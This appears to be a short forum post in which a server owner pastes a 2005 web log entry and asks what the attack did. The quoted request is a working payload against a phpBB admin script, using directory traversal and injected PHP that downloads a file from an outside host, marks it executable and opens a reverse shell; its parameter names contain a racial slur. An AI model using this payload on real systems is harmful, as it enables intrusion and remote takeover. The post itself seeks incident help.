Anyone know what this remote root exploit does?
202.84.223.166 - - [18/May/2005:17:48:07 -0400] "GET /admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=d6510099c6293d5c50bcabefa76b6c46&niggaip=203.81.202.65&niggaport=6432&nigga=$a=fopen(\"http://www.pakhackers.com/pgc\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\"/tmp/.sesss_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sesss_\",0777);system(\"/tmp/.sesss_%20\".$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.0" 200 3941
This is a remote code execution exploit. It took over the userid running the http server. From there, it somehow got into root and executed "find /home/ -name index.* -exec cp /home/index.php".
Does anyone have information on this hack and everything it may have done to my system, especially what local root vulnerability it exploited?
